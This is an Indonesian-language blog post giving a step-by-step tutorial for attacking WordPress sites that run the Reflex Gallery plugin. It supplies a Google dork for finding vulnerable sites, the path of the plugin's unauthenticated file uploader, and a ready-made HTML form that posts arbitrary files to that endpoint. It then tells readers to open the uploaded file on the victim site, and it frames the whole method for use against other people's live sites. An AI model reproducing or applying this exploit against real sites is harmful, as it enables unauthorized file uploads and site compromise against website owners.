Sabtu, 18 April 2015

Assalamuallaikum ^_^

ok kita langsung saja ya :D

pertama kita cari target dengan dork berikut :

Dork : inurl:/wp-content/plugins/reflex-gallery/
( silakan dikembangkan lagi :v )





kalau sudah dapat target , masukan exploit berikut :
Exploit : wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php

kalau vuln , maka akan ada tulisan : {"error":"No files were uploaded."}

kemudian buka notepad , dan pastekan script CSRF berikut :

<html> <title>Reflex-Gallery CSRF</title> <form method="POST" action="http://target-anda.com/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php" enctype="multipart/form-data" > <input type="file" name="qqfile"><br> <input type="submit" name="Submit" value="Pwn!"> </form> </html>


tulisan yang berwarna merah silakan ganti dengan target kalian ^_^

kalau sudah , save dengan exsentasi .html dan buka file CSRFnya dengan web browser

upload file kalian , dan klik Pwn!

kalau sukses akan seperti gambar berikut :


disini saya mengupload gambar saja :D

sekarang coba buka : http://target-anda.com/wp-content/uploads/nama file




haah :D

gimana ? mudahkan :)

ok , sekian artikel dari saya ^_^




EmoticonEmoticon